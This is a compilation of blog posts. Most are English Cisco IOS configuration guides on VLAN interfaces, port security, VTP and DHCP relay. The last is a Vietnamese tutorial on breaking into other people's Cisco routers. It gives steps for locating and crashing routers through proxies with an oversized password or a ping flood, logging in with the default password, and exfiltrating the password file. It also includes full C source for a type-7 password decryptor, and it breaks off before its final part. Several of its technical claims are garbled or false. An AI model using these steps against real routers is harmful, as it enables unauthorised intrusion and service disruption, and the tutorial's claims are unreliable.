High CPU usage when SNMP is enabled in Cisco Routers (Jun 19, 2008)
Configure MD5 encrypted passwords for users on Cisco IOS (May 20, 2008)
Allow user view Running/Startup-Config (red-only) in Cisco IOS (May 12, 2008)

2 Comments so far »

by Tawfiq, on May 29 2008 @ 1:21 pm

Thanks to him who is written this document -
-he is describe easily here what is
dhcp snooping and how to implement this security feature
its a brilliant do doubt -
by Cisco.zephyr, on July 29 2008 @ 10:52 am

This was straight to the point and gave just enough references to follow up for my own reasoning and thoughts.
Thank you for a (as the other person commented)Brilliant simplistic configuration.

How to create VLAN Interfaces for InterVLAN Routing in Cisco IOS

2008-10-16T03:07:00.000-07:00

How to create VLAN Interfaces for InterVLAN Routing in Cisco IOS
Posted on Jul 01, 2008 under Cisco |

Tags:Cisco cisco-switch InterVLAn-Routing ios router switch vlan

VLAN Interfaces are required in network scenarios where you have different VLANs and need Inter-VLAN switching on Layer3 (Routing capable) switches. Every VLAN that needs to be routed should have a VLAN interface.

Let's say we have VLAN 10 which hosts the subnet 192.168.10.0 subnet, VLAN hosts 192.168.20.0 subnet and VLAN 30 hosts 192.168.30.0 subnet. For Inter-VLAN routing to work, we need to have a VLAN interface setup for each of these VLANs and configured with an IP address from the same subnet which will be the default Gateway for that subnet. Lets say, 192.168.10.254,192.168.20.254.192.168.30.254 are the IP addresses for VLAN Interfaces of VLAn 10,20,30 respectively.

Assuming the VLANs are configured already, let's proceed to get the VLAN interfaces created.

Enable Routing on the Switch

ciscoswitch# conf t

ciscoswitch(config)# ip routing

Add VLAN Interface

ciscoswitch(config)# interface vlan10

ciscoswitch(config-if)# no shut

ciscoswitch(config-if)# ip address 192.168.10.0 255.255.255.0

This configures a VLAN interface for VLAN 10.

Default Route on Switch

Add a default route on the Switch. This will forward all traffic from the different VLANs to the default router.

ciscoswitch(config)#ip route 0.0.0.0 0.0.0.0 192.168.100.1

Interface to the Router

If the switch cannot reach the default router through a VLAN then an interface that connects to the router which does these routing needs to configured as a routed interface and assigned with an IP address that is in the same subnet as that of the Default router.

ciscoswitch(config)# interface gi0/1

ciscoswitch(config-if)# no shut

ciscoswitch(config-if)# no switchport

ciscoswitch(config-if)# ip address 192.168.100.2 255.255.255.0

This makes the inerface as a routed interface and assigns an IP address in the same subnet as the default router.
Related Posts

* Unable to delete Stale/Obsolete statc routes in Cisco IOS (Jul 03, 2008)
* High CPU usage when SNMP is enabled in Cisco Routers (Jun 19, 2008)
* Configure MD5 encrypted passwords for users on Cisco IOS (May 20, 2008)
* Enable/Configure DHCP Snooping in Cisco Catalyst Switches (IOS) (May 15, 2008)
* Allow user view Running/Startup-Config (red-only) in Cisco IOS (May 12, 2008)

url:http://www.itsyourip.com/cisco/how-to-create-vlan-interfaces-for-intervlan-routing-in-cisco-ios/

Configure Cisco Port Security on Switches and Router interface

2008-10-16T02:08:00.000-07:00

Configure Cisco Port Security on Switches and Router interface
Posted on Dec 04, 2007 under Cisco, Security |

Tags:Cisco ios mac-address port-security router Security switch

Cisco Port Security is a features that can help secure access to the physical network. Any Network admins nightmare is an unauthorised device or a PC connecting to the network. This could be as simple as an innocent guest plugging his PC into a floor port hoping to get an internet connection or a malicious intruder connecting to the network trying to gain access to confidential information.

Consequences could as bad as

* Virus, Spyware or malware infection from a PC unprotected PC
* A malicious hacker or an intruder gaining access to the network
* A malicous attacker launching a Denial of Service attack using MAC Address flooding

Cisco IOS has the port-security feature which can be used to restrict the MAC-Address of the devices that connects to each of the physical switchports.

Cisco Port-Security can help to

* restrict the MAC-address or addresses that can connect through a switchport [default: first connected device MAC Address]
* restrict the number of MAC-Addresses that can connect through a switchport [default is 1 and maximum is 128]
* set aging in minutes of the MAC Addresses registed
* Action to take when there is a violation detected (default is to disable the port and send an SNMP Trap message to the SNMP management server (if any))

For a switch port to be security enabled,

* the switchport cannot be a Trunk Port
* the switchport cannot be a destination port for a Switchport Analyzer (SPAN)
* the switchport cannot belong to an EtherChannel port-channel interface
* the switchport cannot be an 802.1X port

If you try to enable 802.1X on a secure port, an error message appears, and 802.1X is not enabled. If you try to change an 802.1X-enabled port to a secure port, an error message appears, and the security settings are not changed.

To enable Port Security on a Cisco Switch or router interface

Enter the interface config mode (say fa0/1)

Switch# conf t

Switch(config)# interface fastethernet 0/1

Switch(config-if)# switchport mode access

This sets the switchport to access mode. Default mode of "Dynamic desirable" cannot be configured as a secure port

Switch(config-if)# switchport port-security

This enables the port security on the switchport with the defaults [1 MAC Address allowed, 1st connected MAC Address, disable port if there is a violation]

If you know the MAC Address of the device and that thats the only device that connects to the swicthport (for example, A server on a Serverfarm switch) then you can set the MAC-Address manually.

Switchport(config-if)# switchport port-security mac-address 1111.2222.3333

Where 1111.2222.3333 is the MAC Address of the server. This will disable the secure port, if any other device other than the one with the above MAC-Address connects to the switch port.

If there is a switch or a hub (say 12 port or a 24 port) that connects to the switchport which you want to secure then you can set the maximum number of MAC-Addresses that connects to the port and/or set the MAC-Address optionally.

Switchport(config-if)# switchport port-security max 12

This sets the maximum number of mac-address allowed on the secure port (default is 128).

One step further, if you want to manually add some or all of these MAC-Addresses then you can specify using the following command one for each MAC-Address

Switchport(config-if)# switchport port-security mac-address 0000.0000.0000

Switchport(config-if)# switchport port-security mac-address 0000.0000.1111

If now, you need to set the maximum number of MAC Addresses on the switchport but are aware that some or most of them are temporary ones (guest users or temporary workers) then you can set the aging time on the port-security which allows MAC-Addresses on the Secure switchport will be deleted after the set aging time. This helps to avoid a situation where obsolete MAC-Address occupy the table and saturates causing a violation (when the max number exceeds).

Switchport(config-if)# switchport port-security aging time 10

Where time is specified in minutes (10 mins in the above)

Now, you can set the action to be taken when there is a violation. The default is to shutdown the port and mark the port err-disabled.

For example,

Switchport(config-if)# switchport port-security violation protect

Where protect is the action taken when a violation event is triggered.

The actions are

protect — Drops packets with unknown source addresses until you remove a sufficient number of secure MAC addresses to drop below the maximum value.

restrict — Drops packets with unknown source addresses until you remove a sufficient number of secure MAC addresses to drop below the maximum value and causes the Security Violation counter to increment.

shutdown (default) — Puts the interface into the error-disabled state immediately and sends an SNMP trap notification.

To show the port-security,

Switch# show port-security interface fastethernet 0/1
Security Enabled:Yes, Port Status:SecureUp
Violation Mode:Shutdown
Max. Addrs:5, Current Addrs:0, Configure Addrs:0

To display port-security info without any interface provided

Switch# show port-security
Secure Port MaxSecureAddr CurrentAddr SecurityViolation Security
Action
(Count) (Count) (Count)
—————————————————————————-
Fa0/1 11 11 0 Shutdown
Fa0/2 15 5 0 Restrict
Fa0/3 5 4 0 Protect
—————————————————————————-
Total Addresses in System: 21
Max Addresses limit in System: 128

To display the security MAC-Address table

Switch# show port-security address
Secure Mac Address Table
——————————————————————-
Vlan Mac Address Type Ports Remaining Age
(mins)
—- ———– —- —– ————-
1 0001.0001.0001 SecureDynamic Fa0/1 15 (I)
1 0001.0001.0002 SecureDynamic Fa0/1 15 (I)
1 0001.0001.0003 SecureConfigured Fa0/1 16 (I)
1 0001.0001.0004 SecureConfigured Fa0/1 -
1 0001.0001.0005 SecureConfigured Fa0/1 -
1 0005.0005.0006 SecureConfigured Fa0/5 23
1 0005.0005.0007 SecureConfigured Fa0/5 23
1 0005.0005.0008 SecureConfigured Fa0/5 23
1 0011.0011.0009 SecureConfigured Fa0/11 25 (I)
1 0011.0011.0010 SecureConfigured Fa0/11 25 (I)
——————————————————————-
Total Addresses in System: 10
Max Addresses limit in System: 128

For more information, check this Cisco documentation

If you're new here, you may want to subscribe to my RSS feed. Thanks for visiting!
Related Posts

* Unable to delete Stale/Obsolete statc routes in Cisco IOS (Jul 03, 2008)
* How to create VLAN Interfaces for InterVLAN Routing in Cisco IOS (Jul 01, 2008)
* High CPU usage when SNMP is enabled in Cisco Routers (Jun 19, 2008)
* Configure MD5 encrypted passwords for users on Cisco IOS (May 20, 2008)
* Enable/Configure DHCP Snooping in Cisco Catalyst Switches (IOS) (May 15, 2008)

Adding a Cisco switch to a VTP domain

2008-10-07T04:01:00.000-07:00

Adding a Cisco switch to a VTP domain
By James on October 16, 2007
757 views
1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading ... Loading ...
Categories: Cisco Tags: IOS

Adding a switch to a VTP domain is fairly easy to do, but done incorrectly, can bring down a whole network. Fortunatly I have not had this happen to me, but I have heard horror stories. There are a few simple steps to take to make sure everything stays running smoothly.

The very first step to complete as soon as you are ready to put a new switch on a network and join it to the domain, is to make sure that the vtp mode is set to transparent. Setting the mode to transparent ensures that the “Configuration Revision” is set to 0. If the switch has been used in a lab and has vlans configured and a configuration revision that is higher than the domain server, even if the switch being added is in client mode, it will overwrite the server and propagate all of it’s vlans across the network.

This is directly taken from Cisco’s website:

A recently added switch can cause problems in the network. It can be a switch that was previously used in the lab, and a good VTP domain name was entered. The switch was configured as a VTP client and was connected to the rest of the network. Then, you brought the trunk link up to the rest of the network. In just a few seconds, the whole network can go down.

If the configuration revision number of the switch that you inserted is higher than the configuration revision number of the VTP domain, it propagates its VLAN database through the VTP domain.

This occurs whether the switch is a VTP client or a VTP server. A VTP client can erase VLAN information on a VTP server. You can tell this has occurred when many of the ports in your network go into the Inactive state but continue to assign to a nonexistent VLAN.

To make sure this does not happen, before you connect the switch to the network, make sure to set the vtp mode to transparent.
C3750-Client(config)#vtp mode transparent
C3750-Client(config)#exit
C3750-Client#show vtp status
C3750-Client#sh vtp status
VTP Version : 2
Configuration Revision : 0
Maximum VLANs supported locally : 1005
Number of existing VLANs : 7
VTP Operating Mode : Transparent
VTP Domain Name :
VTP Pruning Mode : Disabled
VTP V2 Mode : Disabled
VTP Traps Generation : Disabled
MD5 digest : 0×18 0×17 0xE9 0×22 0×49 0×96 0×0C 0×7E
Configuration last modified by 10.10.10.20 at 3-1-93 00:03:25

Now that this switch won’t overwrite the server, configure the vtp domain and password, and then change the mode to client.
C3750-Client(config)#vtp domain Test
Changing VTP domain name from NULL to Test
C3750-Client(config)#vtp password Testpassword
C3750-Client(config)#vtp mode client
Setting device to VTP CLIENT mode

Show the vtp status to confirm.
C3750-Client#show vtp status
VTP Version : 2
Configuration Revision : 62
Maximum VLANs supported locally : 1005
Number of existing VLANs : 38
VTP Operating Mode : Client
VTP Domain Name : Test
VTP Pruning Mode : Enabled
VTP V2 Mode : Enabled
VTP Traps Generation : Disabled
MD5 digest : 0xCD 0×9D 0xFF 0xC3 0×6F 0×63 0×5F 0xF5
Configuration last modified by 10.10.10.2 at 10-16-07 22:16:43

And then a show vlan and check the output to make sure all the vlans have propagated.
C3750-Client#show vlan

The only rule you really need when adding switches is to make sure the switch is in TRANSPARENT mode first.

url:http://jklogic.net/adding-a-cisco-switch-to-a-vtp-domain/

How to configure a Cisco Catalyst switch to act as a DHCP relay agent

2008-10-06T20:38:00.000-07:00

How to configure a Cisco Catalyst switch to act as a DHCP relay agent
How to configure a Cisco Catalyst switch to act as a DHCP relay agent in the following Cisco Catalyst switches:
2940 - 2970 - 3550 - 3560 - 3750 - 4000 - 4500 - 6000 - 6500
Relay agents are used to forward requests and replies between clients and servers when they are not on the same physical subnet.
Relay agent forwarding is distinct from the normal forwarding of an IP router, where IP datagrams are switched between networks somewhat transparently.
Relay agents receive Dynamic Host Configuration Protocol (DHCP) messages and then generate a new DHCP message to send out on another interface.
The 2900XL, 2950 and 3500XL switches cannot be configured as a DHCP helper, or DHCP relay.
This requires a router or a switch with a Layer 3 capability that can do InterVLAN routing.
These switches are Layer 2 devices, which can only do DHCP snooping.
The ip helper-address command is present on a configurable Layer 3 interface.
The general rule is to configure the command on the Layer 3 interface closest to the client.
In order configure a Cisco Catalyst switch to act as a DHCP relay agent, issue the ip helper-address command in interface configuration mode and specify the IP address of the DHCP server on the remote subnet.
This ensures that all DHCP broadcasts are forwarded to that address.
More than one helper address can be configured per interface.
You may also wish to investigate:
Understanding and Troubleshooting DHCP in Catalyst Switch or Enterprise Networks

Cách tấn công hệ thống Cisco!!!

2008-10-02T04:03:00.000-07:00

Tấn công hệ thống Cisco
Cảnh báo:
Đây là bài viết mục dích chỉ nhằm nghiên cứu và hoc tập
KHÔNG ĐƯỢC sử dụng tài liệu này để phá hoại các hệ thống cisco, hoặc thâm nhập bất hợp pháp vào hệ thống. Tài liệu này chỉ nhằm mục đích giáo dục. Chỉ sử dụng tài liệu này một cách hợp pháp (Wargames của các hacker chẳng hạn.), và không được phá hoại bất kì cái gì. Đây là một bài học dẫn dắt từng bước một về cách một những điểm yếu của cisco dẫn tới việc có thể bị truy nhập trái phép. Nếu bạn bị bắt quả tang đang đột nhập vào một bộ dẫn đường cisco, hoặc làm rối loạn hệ thống, bạn có thể làm gián đoạn hàng trăm người dùng internet, tốn kém hàng ngàn đôla, cho nên chỉ sử dụng tài liệu này khi bạn được cho phép ! Sử dụng sai tài liệu này sẽ làm cho bạn gặp rất nhiều rắc rối.

Chú ý: một số bài học được viết cho hệ Unix, và không được chuyển soạn cho
DOS/hay tương thích Windows, cho nên bạn sẽ phải xem tài liệu này bằng trình duyệt Web, hoặc Microsoft Word.
-------------------------------------

- Phần 1: Tại sao lại xâm nhập bộ dẫn đường cisco?

- Phần 2: Tìm một bộ dẫn đường cisco như thế nào ?

- Phần 3: Làm thế nào thâm nhập vào bộ dẫn đường cisco ?

- Phần 4: Phá mật khẩu như thế nào ?

- Phần 5: Sử dụng bộ dẫn đường như thế nào ?

-----------------------------------

Những thứ CẦN biết TRƯỚC khi bạn bắt đầu:

-----------------------------------
Địa chỉ IP là gì?
Địa chỉ IP là gì?

IP là từ viết tắt của Internet Protocol, địa chỉ IP được sử dụng bởi các máy tính khác nhau để nhận biết các máy tính kết nối giữa chúng. Đây là lí do tại sao bạn lại bị IRC cấm, và là cách người ta tìm ra ISP của bạn.
Địa chỉ IP có thể dễ dàng phát hiện ra, người ta có thể lấy được qua các cách sau :
- bạn lướt qua một trang web, IP của bạn bị ghi lại
- trên IRC, bất kì ai cũng có thể có IP của bạn
- trên ICQ, mọi người có thể biết IP của bạn, thậm chí bạn chọn "do not show ip" người ta vẫn lấy được nó
- nếu bạn kết nối với một ai đó, họ có thế gõ "systat", và biết được ai đang kết nối đên họ
- nếu ai đó gửi cho bạn một email với một đoạn mà java tóm IP, họ cũng có thể tóm được IP của bạn

Có rất nhiều cách tóm địa chỉ IP, bao gồm cả việc sử dụng các chương trình back-door như Sub7 hoặc NetBus.
Thế nào là một ISP?

ISP viết tắt cho Internet Service Provider, đó là những công ty mang internet đến cho bạn. Bạn kết nối đến họ mỗi khi bạn dial-up và tạo một kết nối. Mọi người có thế phát hiện ra ISP của bạn chỉ đơn giản bằng cách traceroute bạn (traceroute sẽ được giải thích sau). Nó sẽ trông như thế này:

tracert 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target's isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.
Gói tin TCP/IP là gì?

TCP/IP viết tắt cho Transmission Control Protocol and Internet Protocol, a Gói tin TCP/IP là một khối dữ liệu đã được nén, sau đó kèm thêm một header và gửi đến một máy tính khác. Đây là cách thức truyền tin của internet, bằng cách gửi các gói tin. Phần header trong một gói tin chứa địa chỉ IP của người gửi gói tin. Bạn có thể viết lại một gói tin và làm cho nó trong giống như đến từ một người káhc!! Bạn có thể dùng cách này để tìm cách truy nhập vào rất nhiều hệ thống mà không bị bắt. Bạn sẽ phải chạy trên Linux hoặc có một chương trình cho phép bạn làm điều này. Bài giảng này sẽ không đưa ra cách sử dụng biện pháp này trên bộ dẫn đường Cisco, những sẽ nằm trong tầm tay khi hack vào một hệ thống. Nếu gặp rắc rối khi bạn thử hack vào một hệ thống, sử dụng cách này...
Làm thế nào để giấi IP của bạn:

Tìm một chương trình như Genius 2 hoặc DC IS, chúng sẽ cho phép bạn chạy IdentD. Các chương trình này sẽ thay đổi phần đầu của IP máy tính của bạn ngay lập tức! Dùng cách này khi bạn bị đuổi ra khỏi IRC chat room.... bạn sẽ có thể quay lại ngay lập tức! Bạn cũng có thể sử dụng cách này khi bạn truy nhập vào một hệ thống khác và như thế nó sẽ log id sai
Sử dụng telnet :

Bạn mở telnet đơn giản băng cách chọn Start Menu rồi Run và gõ "telnet".

Một khi bạn đã mở được telnet, bạn sẽ muốn thay đổi một vài tính năng. Chọn Terminal>Preferences. Tại đây bạn có thể thay đổi kích thước vùng đệm font, và một cái thứ nữa. Bạn cũng có thể bật/tắt "local echo", nếu bạn bật,
máy tính sẽ hiển thị mọi thứ bạn gõ vào, và các máy tính khác cũng sẽ hiện cho bạn thấy.
Và bạn có thể sẽ nhận được những thông điệp tương tự như thế này.

bạn gõ "hello", và bạn nhận được
hhelelollo

Điều này xảy ra bởi vì thông tin đã phản hồi lại và những gì nhận được là những gì bạn đã gõ. Lí do duy nhất tôi dùng chương trình này bởi lẽ nó không trả về những gì bạn gõ
Mặc định, telnet sẽ kết nối với một hệ thống bằng cổng telnet, cổng số 23. Và từ bây giờ bạn sẽ không chỉ kết nối băng cổng 23, và khi bạn kết nối, bạn có thể chọn đổi sang dùng cổng 25 chẳng hạn, cổng này được dùng bởi các mail servers. Hoặc có thể là cổng 21, cho FTP. Có hàng nghì cổng, cho nên bạn phải chọn đúng cổng cần thiết
Sử dụng HyperTerminal:

HyperTerminal cho phép bạn thiết lập một "server" trên bất kì cổng nào của máy tính của bạn để thu nhận thông tin đến từ các máy tính nhất định. Để làm được điều này, chọn Start > Programs > Accessories > Communications > HyperTerminal.
Đầu tiên bạn cần phải lựa chọn kết nối, bấm "TCP/IP Winsock", và sau đó đặt vào máy tính mà bạn kết nối với, và số cổng. Bạn có thể sai khiến nó nghe ngóng đầu vào bằng cách chọn Call>Wait for Call. Và bây giờ các máy tính khác có thể kết nối với bạn bằng cổng đó, và bạn có thể chat hay truyền file.
Sử dụng Ping:

Ping thật dễ dàng, chỉ cần mở MS-DOS, và gõ "ping địa_chỉ_ip", mặc định sẽ ping 4 lần, nhưng bạn cũng có thể gõ

"ping ip.address -t"

Cách này sẽ làm máy ping mãi. Để thay đổi kích thước ping làm như sau:
"ping -l (size) địa_chỉ_ip "
Cái ping làm là gửi một gói tin đến một máy tính, sau đó xem xem mất bao lâu gói tin rồi xem xem sau bao lâu gói tin đó quay trở lại, cách này xác định được tốc độ của kết nối, và thời gian cần để một gói tin đi và quay trở lại và chia bốn (gọi là "trip time"). Ping cũng có thể được dùng để làm chậm đi hoặc đổ vỡ hệ thống bằng lụt ping. Windows 98 treo sau một phút lụt ping (Bộ đệm của kết nối bị tràn – có qua nhiều kết nối, nên Windows quyết định cho nó đi nghỉ một chút). Một cuộc tấn công “ping flood” sẽ chiếm rất nhiều băng thông của bạn, và bạn phải có băng thông lớn hơn đối phương ( trừ khi đối phương là một máy chạy Windows 98 và bạn có một modem trung bình, bằng cách đó bạn sẽ hạ gục đối phương sau xấp xỉ một phút lụt ping). Lụt Ping không hiệu quả lắm đổi với những đối phương mạnh hơn một chút. trừ khi bạn có nhiều đường và bạn kiểm soát một số lượng tương đối các máy chủ cùng ping mà tổng băng thông lơn hơn đối phương.
Chú ý: option –t của DOS không gây ra lụt ping, nó chỉ ping mục tiêu một cách liên tục, với những khoảng ngắt quãng giữa hai lần ping liên tiếp. Trong tất cả các hệ Unix hoặc Linux, bạn có thể dùng ping -f để gây ra lụt thực sự. Thực tế là phải ping -f nếu bạn dùng một bản tương thích POSIX (POSIX - Portable Operating System Interface dựa trên uniX), nếu không nó sẽ không phải là một bản Unix/Linux thực sự, bởi vậy nếu bạn dùng một hệ điều hành mà nó tự cho nó là Unix hay Linux, nó sẽ có tham số -f.

Sử dụng TraceRoute:

Để lần theo kết nối của bạn(và xem tất cả các máy tính nằm giữa bạn và mục tiêu), chỉ cần mở MS-DOS prompt, và gõ "tracert địa_chỉ_ip" và bạn sẽ thấy một danh sách các máy tính nằm trên đường giưa máy tính bạn và đối phương.

Bạn có thể dùng cách này để xác định xem liệu có firewalls chặn? Và cách này cũng cho phép xác định ISP của một ai đó (Internet Service Provider).

Để xác định ISP, chỉ việc đơn giản xem địa chỉ IP trước cái cuối cùng, đây chắc chắn là một trong các bộ dẫn đường của một ISP.

Bản chất là gì? Đây là cách mà traceroute làm việc - một gói tin TCP/IP có một giá trị trong phần đầu (đó là phần IP. Nếu bạn không biết nó là gì, hãy bỏ qua vàthen ignore nó và đọc tiếp, điều đó không quan trọng) gọi là TTL, viết tăt cho Time To Live. Một khi gói tin đi qua một bộ dẫn đường thì TTL của nó bị trừ đi một. Đây là cách một bộ đếm chống lại khả năng xảy ra lỗi và một gói tin sẽ bắn ra khắp nơi trên mạng, và lãng phí băng thông.
Cho nên khi một TTL cua một gói tin bằng 0, nó sẽ chết và một lỗi ICMP được gửi trả về người gửi.
Bởi thế, đầu tiên traceroute gửi đi một gói tin có TTL bằng 1. Gói tin sẽ trở lại nhanh chóng, qua việc nhận biết địa chỉ người gử trong phần đầu của thông báo lỗi ICMP, traceroute biết gói tin đã ở đâu trong lần bắn đầu tiên. Sau đó nó gửi một gói tin với TTL có giá trị là 2, và nhận được kết quả trả về của lần bắn 2, mang theo định danh của máy. Và điều này xả ra cho đến khi gói tin đến đích.

Thật thú vị phải không? :-)

Sử dụng proxy server:

Hãy tìm một proxy server chạy trên một cổng mà bạn chọn. Một khi bạn tìm ra, kết nối đến nó bằng telnet hoặc hyperterminal và sau đó nối đến máy tính khác bằng proxy server. Bằng cách này máy tính ở đầu kia sẽ không biết được địa IP của bạn.
----------------------------------

Phần 1: Tại sao lại hack cisco router?

Có thể bạn thắc mắc.. tại sao lại hack cisco router?

Lí do là chúng thật là hữu ích để bẻ khoá các hệ thống khác...

Cisco routers rất nhanh, một số có tốc độ kết nối 18 T1 trên một hệ thống, và chúng rất linh hoạt và chúng có thể sử dụng cho các cuộc tấn công DoS hoặc hack vào các hệ thống khác bởi vì hầu hết chúng chạy telnet.

Có hàng nghìn gói tin chạy qua chúng một lúc, và ta có thể bắt và giải mã các gói tin... Rất nhiều cisco routers được tin cậy, và cho phép bạn truy nhập nhất định vào các máy tính khác trong mạng của nó.

----------------------------------
Phần 2: Tìm một cisco router

Tìm bộ dẫn đường Cisco là công việc tương đối dễ, hầu hế mỗi ISP đều dẫn qua ít nhất một cisco router. Cách dễ nhất để tìm ra một bộ dẫn đường Cisco là chạy traceroute từ dos (gõ "tracert" và địa chỉ IP của một máy tính khác), bạn có thể lần ra nhiều thông tin nhờ các máy tính mà nó hiện ra giữa máy tính bạn và máy tính của họ. Một trong số những hệ thống này có thể có cụm từ "cisco" trong tên của nó. Nếu bạn tìm thấy điều gì đó tương tự như vậy, hãy copy lại địa chỉ IP của nó.

Giờ đây bạn đã biết nơi có một cisco router, nhưng nó có thể được bảo vệ bởi firewall, bạn nên kiểm tra xem nó có được bảo vệ không bằng cách ping nó một vài lần, nếu bạn nhận được trả lời thì có thể là nó không bị khoá. Một cách làm khác là thử truy nhập vào một số cổng của cisco router, điều này được thực hiện dễ dàng bằng cách sử dụng telnet, và tạo một kết nối tới router bằng cổng 23.. Nếu nó đòi password, mà không hỏi username nghĩa là bạn đang kề bên router, nhưng nếu nó đòi username, thì có lẽ là đã bị firewall.
Thử tìm một router không có firewall, bởi lẽ bài giảng này tutorial là về routers chứ không phải về cách qua firewalls. Khi bạn đã tìm ra một hệ thống ổn định, bạn cần tìm một proxy server cho phép sử dụng cổng 23, bằng cách này IP của bạn sẽ không bị lưu lại bởi router.

---------------------------------
Phần 3: Đột nhập cisco router

Các Cisco router chạy phiên bản v4.1 (hiện còn rất phổ biến) có thể hạ gục dễ dàng. Bạn chỉ cần kết nối với router bằng cổng 23 qua proxy server, và nhập vào một chuỗi password KHỔNG LỒ, như là;

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1029384 7465qpwoeirutyalskdjfhgzmxncbv019
dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1029 3847465qpwoeirutyalskdjfhgzmxncbv
019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1 0293847465qpwoeirutyalskdjfhgzmx
ncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019 dsk10293847465qpwoeirutyalskdjfh
gzmxncbv019dsk

Chờ một chút, hệ thống cisco có thể sẽ khởi động lại, trong trường hợp đó bạn sẽ không hack được bởi vì chúng offline.. Nhưng chúng thường treo khoảng 2-10 phút, và bạn có thể thâm nhập được.

Nếu cả hai trường hợp đều không xảy ra, nghĩa là nó không chạy phần mềm ngon ăn, trong trường đó bạn có thể thử một vài kiểu tấn công DoS, giống như một lượng ping khổng lồ. Mở dos và gõ "ping -l 56550 cisco.router.ip -t", this will do the same trick for you.

Khi bị treo, mở một kết nối khác đến một vài proxy khác, và dùng password "admin", lí do vì đây là mật khẩu mặc định của router, và khi nó tạm thời bị ngắt nó sẽ chuyển sang chế độ mặc định.

Khi bạn đã đăng nhập, bạn cần giành lấy file password ! Các hệ thống chạy những phần mềm khác nhau nhưng đa số sẽ có lệnh "htl-textil" hoặc gì đó, bạn gõ "?" để hiện ra danh sách các lệnh, bạn sẽ thấy một danh sách khổng lồ các lệnh, ở đâu đó bạn sẽ thấy một lệnh chuyển đổi, dùng nó để lấy password file của admin (người dùng hiện tại) và gửi đến địa chỉ IP ở cổng 23. Nhưng trước khi làm vậy, hãy đặt HyperTerminal chờ thông tin từ cisco router. Một khi bạn gửi file file, HyperTerminal sẽ hỏi xem bạn có đồng ý nhận file này không, chọn đồng ý và lưu nó xuống đĩa. Thoát.

Bạn đã qua phần khó khăn nhất, nghỉ một chút và chuẩn bị phá password!

------------------------------
Phần 4: phá password

Giờ đây bạn đã có được file password, bạn cần phải bẻ khoá nó thì mới có thể truy nhập access router lần nữa. Để làm việc này cần chạy một chương trình đại loại như John the Ripper hoặc một chương trình nào khác để bẻ file password, và bạn có thể bẻ khoá được nó.

Đây là cách dễ nhất, và tôi khuyên bạn dùng cách này. Một cách có thể thử bẻ khoá chúng. Để làm vạy bạn cần một phần mềm giải mã, phải thật kiên nhẫn.

Để giải mã cisco password, bạn phải dịch đoạn mã sau trong linux:

#include
#include

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);

return(0);
}

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}

if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;

case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;

default:
fprintf(stderr, "%s: unknow option.", pname);
}

return(0);
}

if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}

while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;

if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);
}
}
}

Nếu bạn không có Linux, chỉ còn nước bẻ password bằng cách tấn công từ điển hoặc brute-force file đó bằng John the Ripper hoặc một chương trình bẻ khoá khác.

-------------------------------
Phần 5: Sử dụng router

